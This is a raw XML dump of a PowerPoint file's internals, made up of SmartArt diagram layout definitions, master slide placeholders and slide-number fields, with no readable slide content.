        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2622CBEC-780B-4231-B084-2412F4F44460}" type="pres">
      <dgm:prSet presAssocID="{15BC8F29-8483-460A-A27A-EB9734F490EA}" presName="spacerL" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{00F114C5-23C7-4797-9D8F-8CA9744F2B03}" type="pres">
      <dgm:prSet presAssocID="{15BC8F29-8483-460A-A27A-EB9734F490EA}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0806F99-5E59-4F72-B563-59F70108FF1E}" type="pres">
      <dgm:prSet presAssocID="{15BC8F29-8483-460A-A27A-EB9734F490EA}" presName="spacerR" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8DD7CBFE-4B5D-49F1-BEDE-85FFC2A4BD2A}" type="pres">
      <dgm:prSet presAssocID="{BD29A749-3405-46C4-B7E2-B20750BEC23E}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{58E654E0-CB8E-4E5F-A5AE-6F304E1E477D}" srcId="{1EEC2EFB-E23F-4ECE-B230-F903B2726229}" destId="{BD29A749-3405-46C4-B7E2-B20750BEC23E}" srcOrd="2" destOrd="0" parTransId="{9F55505D-E9CC-4089-B50B-23E8DD5ED202}" sibTransId="{E98CEF96-D0CA-49A1-B9B4-43797508DB0C}"/>
    <dgm:cxn modelId="{2B607BE4-1474-48B7-9ABB-02652E933911}" type="presOf" srcId="{1EEC2EFB-E23F-4ECE-B230-F903B2726229}" destId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{C6BFF34A-D04C-497D-9448-19B7B2368314}" srcId="{1EEC2EFB-E23F-4ECE-B230-F903B2726229}" destId="{F7B25C6F-8B11-4661-8EC6-EFE0D3979473}" srcOrd="0" destOrd="0" parTransId="{C6B4686F-5611-4E33-BC95-BAE64EDF95B6}" sibTransId="{959E33AD-0B2F-478B-A25A-25D803190A6D}"/>
    <dgm:cxn modelId="{122FEE96-A78C-4508-A025-91A5609ECADA}" srcId="{1EEC2EFB-E23F-4ECE-B230-F903B2726229}" destId="{05BF4E8C-22DA-455C-903E-B158DBE5DFE0}" srcOrd="1" destOrd="0" parTransId="{C5ABC212-4328-411D-BE9C-C4B0F6FD1152}" sibTransId="{15BC8F29-8483-460A-A27A-EB9734F490EA}"/>
    <dgm:cxn modelId="{66C9791F-2FD9-450D-8C79-23E5189C1D44}" type="presOf" srcId="{15BC8F29-8483-460A-A27A-EB9734F490EA}" destId="{00F114C5-23C7-4797-9D8F-8CA9744F2B03}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{707E4E10-6B54-4EED-B782-B79C66F6082D}" type="presOf" srcId="{05BF4E8C-22DA-455C-903E-B158DBE5DFE0}" destId="{554E3CE6-577D-4D6C-8DA5-CFB60B43CF6C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{AAE81E7E-3882-4301-B15C-387E18AD28B2}" type="presOf" srcId="{BD29A749-3405-46C4-B7E2-B20750BEC23E}" destId="{8DD7CBFE-4B5D-49F1-BEDE-85FFC2A4BD2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{5D26EBA5-FE0D-4A2B-A3EA-184C8778AB9A}" type="presOf" srcId="{959E33AD-0B2F-478B-A25A-25D803190A6D}" destId="{68306426-D89E-4771-A8BC-26B75A4BDE70}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{E37624DC-7780-4610-BE8F-D1381FB658C6}" type="presOf" srcId="{F7B25C6F-8B11-4661-8EC6-EFE0D3979473}" destId="{D6758BBB-54DC-4DE2-B744-517C3580A946}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{70E0F1ED-CEB1-44FF-B4A0-1C8E90A3393A}" type="presParOf" srcId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" destId="{D6758BBB-54DC-4DE2-B744-517C3580A946}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{0E4E1894-F55A-4E2A-88C0-D725C12C7547}" type="presParOf" srcId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" destId="{40DCE71E-EC90-4FBD-BAB0-87262DCB4A87}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{986B59E3-7437-4929-8258-DF247E16B8A4}" type="presParOf" srcId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" destId="{68306426-D89E-4771-A8BC-26B75A4BDE70}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{A8F4D965-33EC-42F1-9A37-9242A3234E52}" type="presParOf" srcId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" destId="{E0B535D3-3AEA-441A-88B9-7C28C6A6F7A2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{98488A1D-E545-420F-9F25-FF86ABD26A1A}" type="presParOf" srcId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" destId="{554E3CE6-577D-4D6C-8DA5-CFB60B43CF6C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{0002A9CD-820F-400C-B289-E80A3F45AA76}" type="presParOf" srcId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" destId="{2622CBEC-780B-4231-B084-2412F4F44460}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{F4D72DAD-1BB6-479F-B686-EACB31881D49}" type="presParOf" srcId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" destId="{00F114C5-23C7-4797-9D8F-8CA9744F2B03}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{5C1D8662-43B1-470E-AB7D-64C29622D59A}" type="presParOf" srcId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" destId="{A0806F99-5E59-4F72-B563-59F70108FF1E}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
    <dgm:cxn modelId="{06B18D23-3BA2-4248-9C48-39F78BE08AEA}" type="presParOf" srcId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" destId="{8DD7CBFE-4B5D-49F1-BEDE-85FFC2A4BD2A}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/equation1"/>
  </dgm:cxnLst>
  <dgm:bg/>
  <dgm:whole/>
</dgm:dataModel>
</file>

<file path=ppt/diagrams/layout1.xml><?xml version="1.0" encoding="utf-8"?>
<dgm:layoutDef xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uniqueId="urn:microsoft.com/office/officeart/2005/8/layout/hList3">
  <dgm:title val=""/>
  <dgm:desc val=""/>
  <dgm:catLst>
    <dgm:cat type="list" pri="1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1" destId="2" srcOrd="0" destOrd="0"/>
        <dgm:cxn modelId="7" srcId="1" destId="3" srcOrd="1" destOrd="0"/>
        <dgm:cxn modelId="8" srcId="1" destId="4" srcOrd="2" destOrd="0"/>
      </dgm:cxnLst>
      <dgm:bg/>
      <dgm:whole/>
    </dgm:dataModel>
  </dgm:sampData>
  <dgm:styleData>
    <dgm:dataModel>
      <dgm:ptLst>
        <dgm:pt modelId="0" type="doc"/>
        <dgm:pt modelId="1"/>
        <dgm:pt modelId="2"/>
        <dgm:pt modelId="3"/>
      </dgm:ptLst>
      <dgm:cxnLst>
        <dgm:cxn modelId="5" srcId="0" destId="1" srcOrd="0" destOrd="0"/>
        <dgm:cxn modelId="6" srcId="1" destId="2" srcOrd="0" destOrd="0"/>
        <dgm:cxn modelId="7" srcId="1" destId="3" srcOrd="1" destOrd="0"/>
      </dgm:cxnLst>
      <dgm:bg/>
      <dgm:whole/>
    </dgm:dataModel>
  </dgm:styleData>
  <dgm:clrData>
    <dgm:dataModel>
      <dgm:ptLst>
        <dgm:pt modelId="0" type="doc"/>
        <dgm:pt modelId="1"/>
        <dgm:pt modelId="2"/>
        <dgm:pt modelId="3"/>
        <dgm:pt modelId="4"/>
        <dgm:pt modelId="5"/>
      </dgm:ptLst>
      <dgm:cxnLst>
        <dgm:cxn modelId="6" srcId="0" destId="1" srcOrd="0" destOrd="0"/>
        <dgm:cxn modelId="7" srcId="1" destId="2" srcOrd="0" destOrd="0"/>
        <dgm:cxn modelId="8" srcId="1" destId="3" srcOrd="1" destOrd="0"/>
        <dgm:cxn modelId="9" srcId="1" destId="4" srcOrd="2" destOrd="0"/>
        <dgm:cxn modelId="10" srcId="1" destId="5" srcOrd="3" destOrd="0"/>
      </dgm:cxnLst>
      <dgm:bg/>
      <dgm:whole/>
    </dgm:dataModel>
  </dgm:clrData>
  <dgm:layoutNode name="composite">
    <dgm:varLst>
      <dgm:chMax val="1"/>
      <dgm:dir/>
      <dgm:resizeHandles val="exact"/>
    </dgm:varLst>
    <dgm:alg type="composite"/>
    <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:blip="">
      <dgm:adjLst/>
    </dgm:shape>
    <dgm:presOf/>
    <dgm:constrLst>
      <dgm:constr type="w" for="ch" forName="roof" refType="w"/>
      <dgm:constr type="h" for="ch" forName="roof" refType="h" fact="0.3"/>
      <dgm:constr type="primFontSz" for="ch" forName="roof" val="65"/>
      <dgm:constr type="w" for="ch" forName="pillars" refType="w"/>
      <dgm:constr type="h" for="ch" forName="pillars" refType="h" fact="0.63"/>
      <dgm:constr type="t" for="ch" forName="pillars" refType="h" fact="0.3"/>
      <dgm:constr type="primFontSz" for="des" forName="pillar1" val="65"/>
      <dgm:constr type="primFontSz" for="des" forName="pillarX" refType="primFontSz" refFor="des" refForName="pillar1" op="equ"/>
      <dgm:constr type="w" for="ch" forName="base" refType="w"/>
      <dgm:constr type="h" for="ch" forName="base" refType="h" fact="0.07"/>
      <dgm:constr type="t" for="ch" forName="base" refType="h" fact="0.93"/>
    </dgm:constrLst>
    <dgm:ruleLst/>
    <dgm:forEach name="Name0" axis="ch" ptType="node" cnt="1">
      <dgm:layoutNode name="roof" styleLbl="dkBgShp">
        <dgm:alg type="tx"/>
        <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="rect" r:blip="">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illars" styleLbl="node1">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pillar1" refType="w"/>
          <dgm:constr type="h" for="ch" forName="pillar1" refType="h"/>
          <dgm:constr type="w" for="ch" forName="pillarX" refType="w"/>
          <dgm:constr type="h" for="ch" forName="pillarX" refType="h"/>
        </dgm:constrLst>
        <dgm:ruleLst/>
        <dgm:layoutNode name="pillar1" styleLbl="node1">
          <dgm:varLst>
            <dgm:bulletEnabled val="1"/>
          </dgm:varLst>
          <dgm:alg type="tx"/>
          <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="rect" r:blip="">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ch" ptType="node" st="2">
          <dgm:layoutNode name="pillarX" styleLbl="node1">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dgm:layoutNode>
      <dgm:layoutNode name="base" styleLbl="dkBgShp">
        <dgm:alg type="sp"/>
        <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="rect" r:blip="">
          <dgm:adjLst/>
        </dgm:shape>
        <dgm:presOf/>
        <dgm:constrLst/>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3.xml><?xml version="1.0" encoding="utf-8"?>
<dgm:layoutDef xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uniqueId="urn:microsoft.com/office/officeart/2005/8/layout/radial4">
  <dgm:title val=""/>
  <dgm:desc val=""/>
  <dgm:catLst>
    <dgm:cat type="relationship" pri="19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t modelId="11"/>
        <dgm:pt modelId="12"/>
      </dgm:ptLst>
      <dgm:cxnLst>
        <dgm:cxn modelId="2" srcId="0" destId="1" srcOrd="0" destOrd="0"/>
        <dgm:cxn modelId="15" srcId="1" destId="11" srcOrd="0" destOrd="0"/>
        <dgm:cxn modelId="16" srcId="1" destId="12" srcOrd="1"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0"/>
              <dgm:param type="spanAng" val="360"/>
              <dgm:param type="ctrShpMap" val="fNode"/>
            </dgm:alg>
          </dgm:if>
          <dgm:else name="Name4">
            <dgm:choose name="Name5">
              <dgm:if name="Name6" axis="ch ch" ptType="node node" st="1 1" cnt="1 0" func="cnt" op="lte" val="3">
                <dgm:alg type="cycle">
                  <dgm:param type="stAng" val="-55"/>
                  <dgm:param type="spanAng" val="110"/>
                  <dgm:param type="ctrShpMap" val="fNode"/>
                </dgm:alg>
              </dgm:if>
              <dgm:else name="Name7">
                <dgm:choose name="Name8">
                  <dgm:if name="Name9" axis="ch ch" ptType="node node" st="1 1" cnt="1 0" func="cnt" op="equ" val="4">
                    <dgm:alg type="cycle">
                      <dgm:param type="stAng" val="-75"/>
                      <dgm:param type="spanAng" val="150"/>
                      <dgm:param type="ctrShpMap" val="fNode"/>
                    </dgm:alg>
                  </dgm:if>
                  <dgm:else name="Name10">
                    <dgm:alg type="cycle">
                      <dgm:param type="stAng" val="-90"/>
                      <dgm:param type="spanAng" val="180"/>
                      <dgm:param type="ctrShpMap" val="fNode"/>
                    </dgm:alg>
                  </dgm:else>
                </dgm:choose>
              </dgm:else>
            </dgm:choose>
          </dgm:else>
        </dgm:choose>
      </dgm:if>
      <dgm:else name="Name11">
        <dgm:choose name="Name12">
          <dgm:if name="Name13" axis="ch ch" ptType="node node" st="1 1" cnt="1 0" func="cnt" op="lte" val="1">
            <dgm:alg type="cycle">
              <dgm:param type="stAng" val="0"/>
              <dgm:param type="spanAng" val="-360"/>
              <dgm:param type="ctrShpMap" val="fNode"/>
            </dgm:alg>
          </dgm:if>
          <dgm:else name="Name14">
            <dgm:choose name="Name15">
              <dgm:if name="Name16" axis="ch ch" ptType="node node" st="1 1" cnt="1 0" func="cnt" op="lte" val="3">
                <dgm:alg type="cycle">
                  <dgm:param type="stAng" val="55"/>
                  <dgm:param type="spanAng" val="-110"/>
                  <dgm:param type="ctrShpMap" val="fNode"/>
                </dgm:alg>
              </dgm:if>
              <dgm:else name="Name17">
                <dgm:choose name="Name18">
                  <dgm:if name="Name19" axis="ch ch" ptType="node node" st="1 1" cnt="1 0" func="cnt" op="equ" val="4">
                    <dgm:alg type="cycle">
                      <dgm:param type="stAng" val="75"/>
                      <dgm:param type="spanAng" val="-150"/>
                      <dgm:param type="ctrShpMap" val="fNode"/>
                    </dgm:alg>
                  </dgm:if>
                  <dgm:else name="Name20">
                    <dgm:alg type="cycle">
                      <dgm:param type="stAng" val="90"/>
                      <dgm:param type="spanAng" val="-180"/>
                      <dgm:param type="ctrShpMap" val="fNode"/>
                    </dgm:alg>
                  </dgm:else>
                </dgm:choose>
              </dgm:else>
            </dgm:choose>
          </dgm:else>
        </dgm:choose>
      </dgm:else>
    </dgm:choose>
    <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:blip="">
      <dgm:adjLst/>
    </dgm:shape>
    <dgm:presOf/>
    <dgm:constrLst>
      <dgm:constr type="w" for="ch" forName="centerShape" refType="w"/>
      <dgm:constr type="w" for="ch" forName="node" refType="w" refFor="ch" refForName="centerShape" fact="0.95"/>
      <dgm:constr type="h" for="ch" forName="parTrans" refType="w" refFor="ch" refForName="centerShape" fact="0.285"/>
      <dgm:constr type="sp" refType="w" refFor="ch" refForName="centerShape" op="equ" fact="0.23"/>
      <dgm:constr type="sibSp" refType="w" refFor="ch" refForName="node" fact="0.1"/>
      <dgm:constr type="primFontSz" for="ch" forName="node" op="equ"/>
    </dgm:constrLst>
    <dgm:choose name="Name21">
      <dgm:if name="Name22" axis="ch ch" ptType="node node" st="1 1" cnt="1 0" func="cnt" op="lte" val="5">
        <dgm:ruleLst>
          <dgm:rule type="w" for="ch" forName="centerShape" val="NaN" fact="0.27" max="NaN"/>
        </dgm:ruleLst>
      </dgm:if>
      <dgm:else name="Name23">
        <dgm:ruleLst>
          <dgm:rule type="w" for="ch" forName="centerShape" val="NaN" fact="0.27" max="NaN"/>
          <dgm:rule type="w" for="ch" forName="node" val="NaN" fact="0.7" max="NaN"/>
        </dgm:ruleLst>
      </dgm:else>
    </dgm:choose>
    <dgm:forEach name="Name24" axis="ch" ptType="node" cnt="1">
      <dgm:layoutNode name="centerShape" styleLbl="node0">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 type="primFontSz" val="65"/>
          <dgm:constr type="h" refType="w"/>
        </dgm:constrLst>
        <dgm:ruleLst>
          <dgm:rule type="primFontSz" val="5" fact="NaN" max="NaN"/>
        </dgm:ruleLst>
      </dgm:layoutNode>
      <dgm:forEach name="Name25" axis="ch">
        <dgm:forEach name="Name26" axis="self" ptType="parTrans">
          <dgm:layoutNode name="parTrans" styleLbl="bgSibTrans2D1">
            <dgm:alg type="conn">
              <dgm:param type="begPts" val="auto"/>
              <dgm:param type="endPts" val="ctr"/>
              <dgm:param type="endSty" val="noArr"/>
              <dgm:param type="begSty" val="arr"/>
            </dgm:alg>
            <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="conn" r:blip="">
              <dgm:adjLst/>
            </dgm:shape>
            <dgm:presOf axis="self"/>
            <dgm:constrLst>
              <dgm:constr type="begPad" refType="connDist" fact="0.055"/>
              <dgm:constr type="endPad"/>
            </dgm:constrLst>
            <dgm:ruleLst/>
          </dgm:layoutNode>
        </dgm:forEach>
        <dgm:forEach name="Name27" axis="self" ptType="node">
          <dgm:layoutNode name="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h" refType="w" fact="0.8"/>
              <dgm:constr type="tMarg" refType="primFontSz" fact="0.15"/>
              <dgm:constr type="bMarg" refType="primFontSz" fact="0.15"/>
              <dgm:constr type="lMarg" refType="primFontSz" fact="0.15"/>
              <dgm:constr type="rMarg" refType="primFontSz" fact="0.15"/>
            </dgm:constrLst>
            <dgm:ruleLst>
              <dgm:rule type="primFontSz" val="5" fact="NaN" max="NaN"/>
            </dgm:ruleLst>
          </dgm:layoutNode>
        </dgm:forEach>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5.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equation1">
  <dgm:title val=""/>
  <dgm:desc val=""/>
  <dgm:catLst>
    <dgm:cat type="relationship" pri="17000"/>
    <dgm:cat type="process"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choose name="Name0">
      <dgm:if name="Name1" func="var" arg="dir" op="equ" val="norm">
        <dgm:alg type="lin">
          <dgm:param type="fallback" val="2D"/>
        </dgm:alg>
      </dgm:if>
      <dgm:else name="Name2">
        <dgm:alg type="lin">
          <dgm:param type="linDir" val="fromR"/>
          <dgm:param type="fallback" val="2D"/>
        </dgm:alg>
      </dgm:else>
    </dgm:choose>
    <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:blip="">
      <dgm:adjLst/>
    </dgm:shape>
    <dgm:presOf/>
    <dgm:constrLst>
      <dgm:constr type="w" for="ch" ptType="node" refType="w"/>
      <dgm:constr type="w" for="ch" ptType="sibTrans" refType="w" refFor="ch" refPtType="node" fact="0.58"/>
      <dgm:constr type="primFontSz" for="ch" ptType="node" op="equ" val="65"/>
      <dgm:constr type="primFontSz" for="ch" ptType="sibTrans" op="equ" val="55"/>
      <dgm:constr type="primFontSz" for="ch" ptType="sibTrans" refType="primFontSz" refFor="ch" refPtType="node" op="lte" fact="0.8"/>
      <dgm:constr type="w" for="ch" forName="spacerL" refType="w" refFor="ch" refPtType="sibTrans" fact="0.14"/>
      <dgm:constr type="w" for="ch" forName="spacerR" refType="w" refFor="ch" refPtType="sibTrans" fact="0.14"/>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sibTransForEach" axis="followSib" ptType="sibTrans" cnt="1">
        <dgm:layoutNode name="spacerL">
          <dgm:alg type="sp"/>
          <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:blip="">
            <dgm:adjLst/>
          </dgm:shape>
          <dgm:presOf/>
          <dgm:constrLst/>
          <dgm:ruleLst/>
        </dgm:layoutNode>
        <dgm:layoutNode name="sibTrans">
          <dgm:alg type="tx"/>
          <dgm:choose name="Name3">
            <dgm:if name="Name4" axis="followSib" ptType="sibTrans" func="cnt" op="equ" val="0">
              <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="mathEqual" r:blip="">
                <dgm:adjLst/>
              </dgm:shape>
            </dgm:if>
            <dgm:else name="Name5">
              <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="mathPlus" r:blip="">
                <dgm:adjLst/>
              </dgm:shape>
            </dgm:else>
          </dgm:choose>
          <dgm:presOf axis="self"/>
          <dgm:constrLst>
            <dgm:constr type="h" refType="w"/>
            <dgm:constr type="lMarg"/>
            <dgm:constr type="rMarg"/>
            <dgm:constr type="tMarg"/>
            <dgm:constr type="bMarg"/>
          </dgm:constrLst>
          <dgm:ruleLst>
            <dgm:rule type="primFontSz" val="5" fact="NaN" max="NaN"/>
          </dgm:ruleLst>
        </dgm:layoutNode>
        <dgm:layoutNode name="spacerR">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a:defRPr sz="1200"/>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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FF068B00-EDC9-4408-917E-E969E3015E1D}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/10/2008</a:t>
            </a:fld>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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{93B2B6C8-70E3-4FD2-BA8A-BE1931CC7435}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8685213"/>
            <a:ext cx="5794375" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="500">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© 2007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dirty="0"/>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a:defRPr sz="1200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>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atin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0F8DB17C-AF29-4596-B701-1515CBD94AB3}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/10/2008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rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="0"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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0"/>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6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8685213"/>
            <a:ext cx="5794375" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="500">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© 2007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atin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr 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rtl="0">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" rtl="0">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" rtl="0">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" rtl="0">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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>14</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>15</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>16</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>17</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
